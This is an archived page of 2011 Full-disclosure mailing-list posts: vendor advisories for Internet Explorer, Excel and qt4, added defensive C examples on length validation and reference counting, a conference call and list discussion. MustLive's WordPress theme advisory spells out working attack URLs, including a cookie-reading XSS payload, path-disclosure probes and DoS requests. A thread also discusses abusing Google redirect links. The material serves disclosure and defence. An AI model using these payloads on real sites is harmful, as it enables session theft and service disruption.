http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

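Both Excel advisories above come down to the same parser mistake: a byte count used for a memcpy that was never validated against the data actually present. In ZDI-11-121 the length variable is left uninitialised on one path; in ZDI-11-120 the byte count is miscalculated when a flag says the following string is double-byte. The C below is an added example written for this page, not ZDI's or Microsoft's code. The record layout it parses (u16 type, u16 len, u8 flags, u8 cch, string bytes), the constant names and the `parse_built` helper are all constructed for illustration and do not match the real BIFF record formats; what it shows is the defender's side of both bug classes: every length is initialised, derived after the flag that influences it is read, and checked against both the record and the destination before the copy.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Constructed record layout for this example (an assumption, not the real
 * Excel BIFF layout):
 *   u16 type | u16 len | u8 flags | u8 cch | string bytes ...
 * 'len' counts everything after the 4-byte header; flags bit 0 says each
 * character of the string is 2 bytes wide; 'cch' is the character count. */
enum { REC_HDR = 4, REC_FIXED = 2, TEXT_MAX = 64 };

enum parse_status { PARSE_OK = 0, PARSE_TRUNCATED, PARSE_BAD_LENGTH, PARSE_TOO_LARGE };

typedef struct {
    uint16_t type;
    uint8_t  flags;
    uint8_t  cch;
    size_t   nbytes;          /* validated byte length of the copied string */
    uint8_t  text[TEXT_MAX];  /* fixed destination the memcpy must respect */
} record_t;

enum parse_status parse_record(const uint8_t *buf, size_t buflen, record_t *out)
{
    /* Initialise everything a length will be derived from before any path
     * can skip the assignment: an uninitialised length feeding memcpy is
     * the defect class described in ZDI-11-121. */
    size_t nbytes = 0;
    memset(out, 0, sizeof(*out));

    if (buflen < REC_HDR) return PARSE_TRUNCATED;
    uint16_t type = (uint16_t)(buf[0] | (buf[1] << 8));
    uint16_t len  = (uint16_t)(buf[2] | (buf[3] << 8));
    if (len > buflen - REC_HDR) return PARSE_TRUNCATED;   /* declared length must fit what we have */
    if (len < REC_FIXED) return PARSE_BAD_LENGTH;          /* flags and cch must be present */

    uint8_t flags = buf[REC_HDR];
    uint8_t cch   = buf[REC_HDR + 1];
    /* The byte count depends on the width flag (the miscalculation in
     * ZDI-11-120 is of this kind), so derive it after reading the flag and
     * check it against both the record and the destination. */
    nbytes = (size_t)cch * ((flags & 1) ? 2 : 1);
    if (nbytes > (size_t)len - REC_FIXED) return PARSE_BAD_LENGTH;
    if (nbytes > sizeof(out->text)) return PARSE_TOO_LARGE;

    out->type = type;
    out->flags = flags;
    out->cch = cch;
    out->nbytes = nbytes;
    memcpy(out->text, buf + REC_HDR + REC_FIXED, nbytes);   /* length fully validated */
    return PARSE_OK;
}

/* Result of the most recent parse_built() call, kept for inspection. */
record_t last_record;

/* Builds a constructed record in a static buffer and parses it. 'declared_len'
 * is written into the header as-is so a lying header can be exercised;
 * 'payload_len' bytes of 'A' actually follow the flags/cch pair. */
enum parse_status parse_built(uint8_t flags, uint8_t cch, size_t payload_len, uint16_t declared_len)
{
    static uint8_t buf[1024];
    if (payload_len > sizeof(buf) - REC_HDR - REC_FIXED) return PARSE_TOO_LARGE;
    buf[0] = 0x01; buf[1] = 0x00;                     /* constructed record type */
    buf[2] = (uint8_t)(declared_len & 0xff);
    buf[3] = (uint8_t)(declared_len >> 8);
    buf[REC_HDR] = flags;
    buf[REC_HDR + 1] = cch;
    memset(buf + REC_HDR + REC_FIXED, 'A', payload_len);
    return parse_record(buf, REC_HDR + REC_FIXED + payload_len, &last_record);
}

int main(void)
{
    static const char *names[] = { "OK", "TRUNCATED", "BAD_LENGTH", "TOO_LARGE" };
    printf("narrow, 6 chars in 6 bytes:        %s\n", names[parse_built(0, 6, 6, 8)]);
    printf("wide, 3 chars in 6 bytes:          %s\n", names[parse_built(1, 3, 6, 8)]);
    printf("wide, 6 chars but only 6 bytes:    %s\n", names[parse_built(1, 6, 6, 8)]);
    printf("header claims 64 bytes, 6 present: %s\n", names[parse_built(0, 6, 6, 64)]);
    printf("wide, 255 chars (510 bytes):       %s\n", names[parse_built(1, 255, 510, 512)]);
    return 0;
}
```

The third and fifth cases are the instructive ones: a character count that is plausible on its own becomes an overrun once the width flag doubles it, and a record that is internally consistent can still be larger than the fixed buffer it is copied into. A parser that checks only one of those two bounds is still exploitable by the other.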


[Full-disclosure] ZDI-11-119: (Pwn2Own) Microsoft Internet Explorer onPropertyChange Remote Code Execution Vulnerability

2011-04-12 Thread ZDI Disclosures
ZDI-11-119: (Pwn2Own) Microsoft Internet Explorer onPropertyChange Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-119

April 12, 2011

-- CVE ID:
CVE-2011-1345 

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Internet Explorer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11040. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Internet Explorer. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the way Internet Explorer handles
onPropertyChange function calls. When the onPropertyChange event handler
is set to an object's attribute collection, it fails to keep an accurate
reference counter to the event object. The effect of this can be that
the program frees the event object while there are still references to
it. This can result in remote code execution under the context of the
current user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/Bulletin/MS11-018.mspx

-- Disclosure Timeline:
2011-03-09 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Stephen Fewer of Harmony Security (www.harmonysecurity.com)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi

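The ZDI-11-119 write-up describes a reference count that is not kept accurate when an event handler is stored, so the event object can be freed while something still points at it. The C below is an added example for this page, not Internet Explorer's or ZDI's code; `event_t`, `handler_t` and the `live_events` counter are constructed for illustration. It shows the ownership rule that prevents the bug class (whoever stores a pointer beyond the current call takes a counted reference) and, beside it, the unaccounted-for copy that leaves a dangling pointer. The buggy scenario detects the dangling state through the allocation counter and never dereferences freed memory.

```c
#include <stdlib.h>
#include <stdio.h>

/* A reference-counted event object. 'live_events' is instrumentation only:
 * it lets the scenarios below observe whether an object is still allocated
 * without ever touching freed memory. */
typedef struct {
    int refcount;
    int id;
} event_t;

static int live_events = 0;

event_t *event_new(int id)
{
    event_t *e = malloc(sizeof(*e));
    if (e == NULL) abort();
    e->refcount = 1;         /* the creator owns the first reference */
    e->id = id;
    live_events++;
    return e;
}

void event_retain(event_t *e)  { e->refcount++; }

void event_release(event_t *e)
{
    if (--e->refcount == 0) {  /* last owner gone: the object is freed here */
        live_events--;
        free(e);
    }
}

/* A handler slot: anything that stores an event pointer beyond the current
 * call is an owner and must hold a counted reference. */
typedef struct { event_t *bound; } handler_t;

void handler_bind(handler_t *h, event_t *e)
{
    event_retain(e);                   /* take our reference before dropping the old one */
    if (h->bound) event_release(h->bound);
    h->bound = e;
}

void handler_unbind(handler_t *h)
{
    if (h->bound) { event_release(h->bound); h->bound = NULL; }
}

/* Correct ownership: returns 0 when the event stays allocated while the slot
 * holds it and is freed only when the slot lets go, -1 otherwise. */
int scenario_correct(void)
{
    handler_t h = { NULL };
    event_t *e = event_new(1);         /* caller: refcount 1 */
    handler_bind(&h, e);               /* slot: refcount 2 */
    event_release(e);                  /* caller done: refcount 1, still alive */
    int alive_while_bound = (live_events == 1);
    handler_unbind(&h);                /* slot done: refcount 0, freed */
    int freed_after_unbind = (live_events == 0);
    return (alive_while_bound && freed_after_unbind) ? 0 : -1;
}

/* The defect class in the advisory: the slot stores the pointer without
 * taking a reference. Returns 1 when the slot is left pointing at an object
 * that no longer exists (detected via the counter, never by dereferencing). */
int scenario_missing_retain(void)
{
    handler_t h = { NULL };
    event_t *e = event_new(2);         /* refcount 1 */
    h.bound = e;                       /* BUG: no event_retain() for the stored copy */
    int slot_populated = (h.bound != NULL);
    event_release(e);                  /* the only counted reference drops: freed */
    int dangling = slot_populated && (live_events == 0);
    h.bound = NULL;                    /* clear the stale pointer instead of using it */
    return dangling;
}

int main(void)
{
    printf("correct ownership: %s\n", scenario_correct() == 0
           ? "object freed exactly once, after unbind" : "unexpected");
    printf("missing retain:    %s\n", scenario_missing_retain()
           ? "slot left dangling after release" : "no dangling reference");
    return 0;
}
```

In a code review this is the check to make at every site that stores an object pointer in a longer-lived structure (an attribute collection, a callback table, a cache): is there a retain paired with the store and a release paired with the removal? The allocation counter used here is the same idea as the leak and use-after-free instrumentation in tools such as AddressSanitizer, reduced to one integer.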


[Full-disclosure] Vulnerabilities in Live Wire 2.0 and Live Wire Style themes for WordPress

2011-04-12 Thread MustLive
Hello list!

I want to warn you about Cross-Site Scripting, Full path disclosure, Abuse
of Functionality and Denial of Service vulnerabilities in the Live Wire 2.0 and
Live Wire Style themes for WordPress. These are another two themes which
are part of the Live Wire series, together with Live Wire Edition. These are
commercial themes for WP by WooThemes.

-
Affected products:
-

Vulnerable are Live Wire 2.0 and Live Wire Style version 2.3.1 and previous
versions. XSS is possible only in old versions of the themes. Recently, in
version 2.4, most of these vulnerabilities were fixed (but many FPD were
still left unfixed).

--
Details:
--

XSS (WASC-08):

http://site/wp-content/themes/livewire/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/livewire/thumb.php?src=jpg

http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=1&w=111

http://site/wp-content/themes/livewire/thumb.php?src=http://site/page.png&h=111&w=1

http://site/wp-content/themes/livewire/

And also 30 other PHP scripts of the theme in the folder /livewire/ and all
subfolders.

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/livewire/thumb.php?src=http://site&h=1&w=1

DoS (WASC-10):

http://site/wp-content/themes/livewire/thumb.php?src=http://site/big_file&h=1&w=1

I wrote about such AoF and DoS vulnerabilities in the article Using of the sites
for attacks on other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).

Besides the folder /livewire/, these themes can also be placed in the folders
/livewire-dev/ and /livewire-package/ (which includes all three themes of
the Live Wire series).


Timeline:


2011.02.01 - informed developers about other themes.
2011.02.05 - announced at my site.
2011.02.07 - additionally informed developers about these themes.
2011.02.04-12 - conversation about fixing holes in all their themes for
WordPress. At first they tried to fix all these holes in themes at their own
sites.
2011.03.28 - developers released version 2.4.
2011.04.12 - disclosed at my site.

I mentioned these vulnerabilities at my site
(http://websecurity.com.ua/4907/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua




Re: [Full-disclosure] [ MDVSA-2011:074 ] qt4

2011-04-12 Thread Zach C.
That's your cue, guys who reported every single program using the same DLL
vulnerable to DLL hijacking! Find those bad certs and start reporting every
single application using Qt! THE WORLD IS COUNTING ON YOU TO INFORM US OF
THESE THREATS TO OUR SECURITY.

On Apr 12, 2011 10:19 AM,  wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> ___
>
> Mandriva Linux Security Advisory MDVSA-2011:074
> http://www.mandriva.com/security/
> ___
>
> Package : qt4
> Date : April 12, 2011
> Affected: 2009.0, 2010.0, 2010.1
> ___
>
> Problem Description:
>
> It was discovered that the QT packages were affected by the fraudulent
> certificates problem as well, the same issue as with firefox
> (MDVSA-2011:068).
>
> Packages for 2009.0 are provided as of the Extended Maintenance
> Program. Please visit this link to learn more:
> http://store.mandriva.com/product_info.php?cPath=149&products_id=490
>
> The updated packages have been patched to solve this issue.
> ___
>
> References:
>
> http://www.mandriva.com/security/advisories?name=MDVSA-2011:068
> http://bugreports.qt.nokia.com/browse/QTBUG-18338
> ___
>
> Updated Packages:
>
> Mandriva Linux 2009.0:
> d3405100e866576e8bac7f69b853067d
2009.0/i586/libqassistant4-4.5.2-1.7mdv2009.0.i586.rpm
> c4f56332b868a3691cde2a5c0448aef7
2009.0/i586/libqt3support4-4.5.2-1.7mdv2009.0.i586.rpm
> b64ab10ea49540af8459ab4000c7767b
2009.0/i586/libqt4-devel-4.5.2-1.7mdv2009.0.i586.rpm
> 278bb8ccef79394b76e888d7fd98f23d
2009.0/i586/libqtclucene4-4.5.2-1.7mdv2009.0.i586.rpm
> 7610dd11459c2fe502abbb972a00ac44
2009.0/i586/libqtcore4-4.5.2-1.7mdv2009.0.i586.rpm
> 664d25b0f1af2ad0d0f77511ec4d895b
2009.0/i586/libqtdbus4-4.5.2-1.7mdv2009.0.i586.rpm
> 40a9ec8c4df313b4a39091611f96
2009.0/i586/libqtdesigner4-4.5.2-1.7mdv2009.0.i586.rpm
> 7fe0928e378629086beb6c2623e713cc
2009.0/i586/libqtgui4-4.5.2-1.7mdv2009.0.i586.rpm
> 6f5885626d703d80690d629b882b78b9
2009.0/i586/libqthelp4-4.5.2-1.7mdv2009.0.i586.rpm
> 3121fb0365a15285b2af0030e636ca85
2009.0/i586/libqtnetwork4-4.5.2-1.7mdv2009.0.i586.rpm
> e215b687c05f2b6b8724b3bab62647a0
2009.0/i586/libqtopengl4-4.5.2-1.7mdv2009.0.i586.rpm
> 2a4f7ed94a4124b8e492beae6cb4e41c
2009.0/i586/libqtscript4-4.5.2-1.7mdv2009.0.i586.rpm
> 34f3a481dc7491a14da1f819518518cf
2009.0/i586/libqtscripttools4-4.5.2-1.7mdv2009.0.i586.rpm
> 26700ef0087c7a673739221dbde454a6
2009.0/i586/libqtsql4-4.5.2-1.7mdv2009.0.i586.rpm
> 3a159ca06df2944229f14fedf6e5d0d3
2009.0/i586/libqtsvg4-4.5.2-1.7mdv2009.0.i586.rpm
> a8b4d8d02503127c20137e5cd1feeb2f
2009.0/i586/libqttest4-4.5.2-1.7mdv2009.0.i586.rpm
> 40377a353b4a722125a8cc3227da999b
2009.0/i586/libqtwebkit4-4.5.2-1.7mdv2009.0.i586.rpm
> 094aa1b4fecc14f526321a2cba1ba6be
2009.0/i586/libqtxml4-4.5.2-1.7mdv2009.0.i586.rpm
> 5a47b688005c38217d2ebd2aaacaab22
2009.0/i586/libqtxmlpatterns4-4.5.2-1.7mdv2009.0.i586.rpm
> 6108509ae6fd3c630344dbd22ae73069
2009.0/i586/qt4-accessibility-plugin-4.5.2-1.7mdv2009.0.i586.rpm
> 94123cd2a7b847b2942f59dcf4f93f94
2009.0/i586/qt4-assistant-4.5.2-1.7mdv2009.0.i586.rpm
> cebb3584f250b31ceae49b1bdfbc271a
2009.0/i586/qt4-common-4.5.2-1.7mdv2009.0.i586.rpm
> 93446ee40dca08fcf3672fcba2f9e4ab
2009.0/i586/qt4-database-plugin-mysql-4.5.2-1.7mdv2009.0.i586.rpm
> 60e58167df55713d856890ebb83f5d7a
2009.0/i586/qt4-database-plugin-odbc-4.5.2-1.7mdv2009.0.i586.rpm
> dade28e78b5f464bd0dfad103e7c42c3
2009.0/i586/qt4-database-plugin-pgsql-4.5.2-1.7mdv2009.0.i586.rpm
> d36ef5589cc939b57af7a31c600dd83a
2009.0/i586/qt4-database-plugin-sqlite-4.5.2-1.7mdv2009.0.i586.rpm
> fcc6ada23f0c2240aec2847220ebeeb9
2009.0/i586/qt4-database-plugin-tds-4.5.2-1.7mdv2009.0.i586.rpm
> 9aa0dfe289e72d711826c95988f2b1c4
2009.0/i586/qt4-designer-4.5.2-1.7mdv2009.0.i586.rpm
> 03d6d09a7d1ff9806f76259a44374f69
2009.0/i586/qt4-doc-4.5.2-1.7mdv2009.0.i586.rpm
> a7905f55658bb95983e804b2f410d239
2009.0/i586/qt4-examples-4.5.2-1.7mdv2009.0.i586.rpm
> 03db0fc6e0a7da2a5b41e234e820cfdb
2009.0/i586/qt4-graphicssystems-plugin-4.5.2-1.7mdv2009.0.i586.rpm
> 96137650ff0e8d3044b8d0a9812f168d
2009.0/i586/qt4-linguist-4.5.2-1.7mdv2009.0.i586.rpm
> b6dc9f1a15a6075bf0961adbfe93263c
2009.0/i586/qt4-qdoc3-4.5.2-1.7mdv2009.0.i586.rpm
> 1a9108aeeae481a176403db5cdce35f4
2009.0/i586/qt4-qtconfig-4.5.2-1.7mdv2009.0.i586.rpm
> 10b5df5dcd6ca2afbb60d056ccdfe6d8
2009.0/i586/qt4-qtdbus-4.5.2-1.7mdv2009.0.i586.rpm
> ebc0b9e53f1f1495d2cffb61938dbcf1
2009.0/i586/qt4-qvfb-4.5.2-1.7mdv2009.0.i586.rpm
> de31a6925a9965f363fc1e8e98227c90
2009.0/i586/qt4-xmlpatterns-4.5.2-1.7mdv2009.0.i586.rpm
> e92dde56825fb3456c7c82b7550c6dd8
2009.0/SRPMS/qt4-4.5.2-1.7mdv2009.0.src.rpm
>
> Mandriva Linux 2009.0/X86_64:
> a0becbaa0c06309d92472b581f9dca42
2009.0/x86_64/lib64qass

[Full-disclosure] [ MDVSA-2011:074 ] qt4

2011-04-12 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2011:074
 http://www.mandriva.com/security/
 ___

 Package : qt4
 Date: April 12, 2011
 Affected: 2009.0, 2010.0, 2010.1
 ___

 Problem Description:

 It was discovered that the QT packages were affected by the fraudulent
 certificates problem as well, the same issue as with firefox
 (MDVSA-2011:068).
 
 Packages for 2009.0 are provided as of the Extended Maintenance
 Program. Please visit this link to learn more:
 http://store.mandriva.com/product_info.php?cPath=149&products_id=490
 
 The updated packages have been patched to solve this issue.
 ___

 References:

 http://www.mandriva.com/security/advisories?name=MDVSA-2011:068
 http://bugreports.qt.nokia.com/browse/QTBUG-18338
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 d3405100e866576e8bac7f69b853067d  
2009.0/i586/libqassistant4-4.5.2-1.7mdv2009.0.i586.rpm
 c4f56332b868a3691cde2a5c0448aef7  
2009.0/i586/libqt3support4-4.5.2-1.7mdv2009.0.i586.rpm
 b64ab10ea49540af8459ab4000c7767b  
2009.0/i586/libqt4-devel-4.5.2-1.7mdv2009.0.i586.rpm
 278bb8ccef79394b76e888d7fd98f23d  
2009.0/i586/libqtclucene4-4.5.2-1.7mdv2009.0.i586.rpm
 7610dd11459c2fe502abbb972a00ac44  
2009.0/i586/libqtcore4-4.5.2-1.7mdv2009.0.i586.rpm
 664d25b0f1af2ad0d0f77511ec4d895b  
2009.0/i586/libqtdbus4-4.5.2-1.7mdv2009.0.i586.rpm
 40a9ec8c4df313b4a39091611f96  
2009.0/i586/libqtdesigner4-4.5.2-1.7mdv2009.0.i586.rpm
 7fe0928e378629086beb6c2623e713cc  
2009.0/i586/libqtgui4-4.5.2-1.7mdv2009.0.i586.rpm
 6f5885626d703d80690d629b882b78b9  
2009.0/i586/libqthelp4-4.5.2-1.7mdv2009.0.i586.rpm
 3121fb0365a15285b2af0030e636ca85  
2009.0/i586/libqtnetwork4-4.5.2-1.7mdv2009.0.i586.rpm
 e215b687c05f2b6b8724b3bab62647a0  
2009.0/i586/libqtopengl4-4.5.2-1.7mdv2009.0.i586.rpm
 2a4f7ed94a4124b8e492beae6cb4e41c  
2009.0/i586/libqtscript4-4.5.2-1.7mdv2009.0.i586.rpm
 34f3a481dc7491a14da1f819518518cf  
2009.0/i586/libqtscripttools4-4.5.2-1.7mdv2009.0.i586.rpm
 26700ef0087c7a673739221dbde454a6  
2009.0/i586/libqtsql4-4.5.2-1.7mdv2009.0.i586.rpm
 3a159ca06df2944229f14fedf6e5d0d3  
2009.0/i586/libqtsvg4-4.5.2-1.7mdv2009.0.i586.rpm
 a8b4d8d02503127c20137e5cd1feeb2f  
2009.0/i586/libqttest4-4.5.2-1.7mdv2009.0.i586.rpm
 40377a353b4a722125a8cc3227da999b  
2009.0/i586/libqtwebkit4-4.5.2-1.7mdv2009.0.i586.rpm
 094aa1b4fecc14f526321a2cba1ba6be  
2009.0/i586/libqtxml4-4.5.2-1.7mdv2009.0.i586.rpm
 5a47b688005c38217d2ebd2aaacaab22  
2009.0/i586/libqtxmlpatterns4-4.5.2-1.7mdv2009.0.i586.rpm
 6108509ae6fd3c630344dbd22ae73069  
2009.0/i586/qt4-accessibility-plugin-4.5.2-1.7mdv2009.0.i586.rpm
 94123cd2a7b847b2942f59dcf4f93f94  
2009.0/i586/qt4-assistant-4.5.2-1.7mdv2009.0.i586.rpm
 cebb3584f250b31ceae49b1bdfbc271a  
2009.0/i586/qt4-common-4.5.2-1.7mdv2009.0.i586.rpm
 93446ee40dca08fcf3672fcba2f9e4ab  
2009.0/i586/qt4-database-plugin-mysql-4.5.2-1.7mdv2009.0.i586.rpm
 60e58167df55713d856890ebb83f5d7a  
2009.0/i586/qt4-database-plugin-odbc-4.5.2-1.7mdv2009.0.i586.rpm
 dade28e78b5f464bd0dfad103e7c42c3  
2009.0/i586/qt4-database-plugin-pgsql-4.5.2-1.7mdv2009.0.i586.rpm
 d36ef5589cc939b57af7a31c600dd83a  
2009.0/i586/qt4-database-plugin-sqlite-4.5.2-1.7mdv2009.0.i586.rpm
 fcc6ada23f0c2240aec2847220ebeeb9  
2009.0/i586/qt4-database-plugin-tds-4.5.2-1.7mdv2009.0.i586.rpm
 9aa0dfe289e72d711826c95988f2b1c4  
2009.0/i586/qt4-designer-4.5.2-1.7mdv2009.0.i586.rpm
 03d6d09a7d1ff9806f76259a44374f69  
2009.0/i586/qt4-doc-4.5.2-1.7mdv2009.0.i586.rpm
 a7905f55658bb95983e804b2f410d239  
2009.0/i586/qt4-examples-4.5.2-1.7mdv2009.0.i586.rpm
 03db0fc6e0a7da2a5b41e234e820cfdb  
2009.0/i586/qt4-graphicssystems-plugin-4.5.2-1.7mdv2009.0.i586.rpm
 96137650ff0e8d3044b8d0a9812f168d  
2009.0/i586/qt4-linguist-4.5.2-1.7mdv2009.0.i586.rpm
 b6dc9f1a15a6075bf0961adbfe93263c  
2009.0/i586/qt4-qdoc3-4.5.2-1.7mdv2009.0.i586.rpm
 1a9108aeeae481a176403db5cdce35f4  
2009.0/i586/qt4-qtconfig-4.5.2-1.7mdv2009.0.i586.rpm
 10b5df5dcd6ca2afbb60d056ccdfe6d8  
2009.0/i586/qt4-qtdbus-4.5.2-1.7mdv2009.0.i586.rpm
 ebc0b9e53f1f1495d2cffb61938dbcf1  
2009.0/i586/qt4-qvfb-4.5.2-1.7mdv2009.0.i586.rpm
 de31a6925a9965f363fc1e8e98227c90  
2009.0/i586/qt4-xmlpatterns-4.5.2-1.7mdv2009.0.i586.rpm 
 e92dde56825fb3456c7c82b7550c6dd8  2009.0/SRPMS/qt4-4.5.2-1.7mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 a0becbaa0c06309d92472b581f9dca42  
2009.0/x86_64/lib64qassistant4-4.5.2-1.7mdv2009.0.x86_64.rpm
 7e6b0967826c57d7178519f07510f0c0  
2009.0/x86_64/lib64qt3support4-4.5.2-1.7mdv2009.0.x86_64.rpm
 97704cc84610709eb09858b6c2957351  
2009.0/x86_64/lib64qt4-devel-4.5.2-1.7mdv2009.0.x86_64.rpm
 e95c14d28f8efbd7bdd343651780240c

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

2011-04-12 Thread Tim
> 2)Only announcements for OSI approved projects.  Webappsec has this
> policy I think, and it rewards people who share the most openly.

I would argue that something like this is the best for full
disclosure.  After all, if you release a tool, your techniques are not
really fully disclosed if you keep the source code closed.

Note that open source != free (example: commercial PGP), but I would
think the source code should be made publicly accessible, even if the
licensing is more restrictive.

However, in the case of "INSECT Pro", the frequency of posts is far
too high, regardless of other considerations.

tim



[Full-disclosure] [IMF 2011] Call for Participation

2011-04-12 Thread Oliver Goebel
Dear all,

please find enclosed the call for participation for IMF 2011.

See the program at:
http://www.imf-conference.org/imf2011/program.html

The conference will take place from Tuesday, May 10th through Thursday,
May 12th in Stuttgart, Germany.

Registration Details can be found at:
http://www.imf-conference.org/imf2011/registration.html

Early registration discounts will be available until April 25th, 2011.

Please excuse possible cross postings.




CALL FOR PARTICIPATION

   IMF 2011

  6th International Conference
   on IT Security Incident Management & IT Forensics

May 10th - 12th, 2011
  Stuttgart, Germany

 Early Registration Closes on April 25th!



IT-Security has become a steady concern for all entities operating
IT-Systems. These include enterprises, governmental and non-governmental
organizations, as well as individuals.  Yet, despite high-end
precautionary measures taken, not every attack or security mishap can be
prevented and hence incidents will go on happening.  In such cases
forensic capabilities in investigating incidents in both technical and
legal aspects are vital to understand their issue and feed back the
knowledge gained into the security process.  Documenting the measures
taken to prevent or minimize damage to own or external IT infrastructure
provides legal rear cover if an involved party decides to start
proceedings. In a possible lawsuit emerging from such an incident, its
treatment in a forensically proper way is crucial to be able to possibly
claim for damages or prevent from being threatened by claims of third
parties.  Thus, capable incident response and forensic procedures have
become an essential part of IT infrastructure operations.

In law enforcement IT forensics is an important branch and its
significance constantly increases since IT has become an essential part
in almost every aspect of daily life.  IT systems produce traces and
evidence in many ways that play a more and more relevant role in
resolving cases.

IMF's intent is to gather experts from throughout the world in order to
present and discuss recent technical and methodical advances in the
fields of IT security incident response and management and IT forensics.
The conference provides a platform for collaboration and exchange of
ideas between industry (both as users and solution providers), academia,
law-enforcement and other government bodies.

CONFERENCE PROGRAM
==
Please find the conference program at:

   http://www.imf-conference.org/imf2011/program.html


REGISTRATION

Please find an overview of the conference fees as well as the
registration form at:

   http://www.imf-conference.org/imf2011/registration.html

Early registration discounts will be available until

  April 25th, 2011


PROGRAM COMMITTEE
=
Rafael Accorsi          Universitaet Freiburg, Germany
Susan Brenner           University of Dayton, USA
Jack Cole               US Army Research Laboratory, USA
Andrew Cormack          JANET, UK
Andreas Dondera         Landeskriminalamt Hamburg, Germany
Ralf Doerrie            Germany
Ralf Ehlert             Universitaet Magdeburg, Germany
Felix Freiling          Universitaet Mannheim, Germany
Sandra Frings           Fraunhofer IAO, Germany
Oliver Goebel           Universitaet Stuttgart, Germany
Detlef Guenther         Volkswagen AG, Germany
Vijay K. Gurbani        Bell Labs, USA
Alexander Herrigel      Abraxas Informatik AG, Switzerland
Stefan Kiltz            Universitaet Magdeburg, Germany
Bernhard M. Haemmerli   ACRIS GmbH, Switzerland
Jim Lyle                NIST, USA
Robert Martin           MITRE Corp., USA
Holger Morgenstern      gutachten.info, Germany
Jens Nedon              Germany
Dirk Schadt             SPOT, Germany
Mark Schiller           Statton Security Ltd, UK
Andreas Schuster        Deutsche Telekom, Germany
Marco Thorbruegge       ENISA, EU
Stephen D. Wolthusen    Royal Holloway, Univ. of London, UK
Steven W. Wood          Alste Technologies GmbH, Germany


CONFERENCE CHAIR

Detlef Guenther
Corporate Internal Audit, Volkswagen AG
chair-2011 @ imf-conference.org


PROGRAM CHAIR
=
Holger Morgenstern
IT-Expert Witness, gutachten.info
pc-chair-2011 @ imf-conference.org


ORGANIZING COMMITTEE

Jack Cole
Ralf Ehlert
Sandra Frings
Oliver Goebel
Detlef Guenther
Stefan Kiltz
Holger Morgenstern
Jens Nedon
Dirk Schadt


STEERING COMMITTEE
==
Sandra Frings
Oliver Goebel
Detlef Guenther
Jens Nedon
Dirk Schadt


UNDER THE AUSPICES OF
=
German Informatics Society (GI e.V.)
Wissenschaftszentrum Ahrstr. 45, 53175 Bonn, Germany
Tel.: +49 228 302 145, Fax: +49

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-12 Thread Valdis . Kletnieks
On Mon, 11 Apr 2011 23:05:37 EDT, Leon Kaiser said:

> I don't see why people are able to directly link to "I'm Feeling Lucky"
> Google search results in the first place. Can anyone think of a
> practical use for it?

For rickrolls, of course.



Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-12 Thread satyam pujari
@Cal Try this...

http://www.google.com/search?q=esploit&btnI

http://www.google.com/search?q=esploit+zeus&btnI

http://www.google.com/search?q=0x+t35&btnI&safe=active

some of them didn't work as well..

http://www.google.com/search?q=0x+t35&btnI

http://www.google.com/search?q=hello+hacker&btnI

but funny "hello human" works..

http://www.google.com/search?q=hello+human&btnI

I bet there's some keyword filter/check at Google's side (but I
believe which can be bypassed)
So, it's all about playing with the keywords.


On Tue, Apr 12, 2011 at 2:39 PM, Cal Leeming  wrote:
>
> Didn't seem to work for me:
> http://www.google.com/search?hl=en&q=easyratemortage+tax+deductible+mortgage
>   +refinancing+strategy&btnI=AaEbK6r0Kz0r9JU4b
>
> On Tue, Apr 12, 2011 at 4:05 AM, Leon Kaiser  wrote:
>>
>> I don't see why people are able to directly link to "I'm Feeling Lucky" 
>> Google search results in the first place. Can anyone think of a practical 
>> use for it?
>>
>> 
>> Leon Kaiser  - Head of GNAA Public Relations -
>>     litera...@gnaa.eu || litera...@goatse.fr
>>    http://gnaa.eu || http://security.goatse.fr
>>   7BEECD8D FCBED526 F7960173 459111CE F01F9923
>> "The mask of anonymity is not intensely constructive."
>>    -- Andrew "weev" Auernheimer
>> 
>>
>> On Sun, 2011-04-10 at 14:05 +0530, satyam pujari wrote:
>>
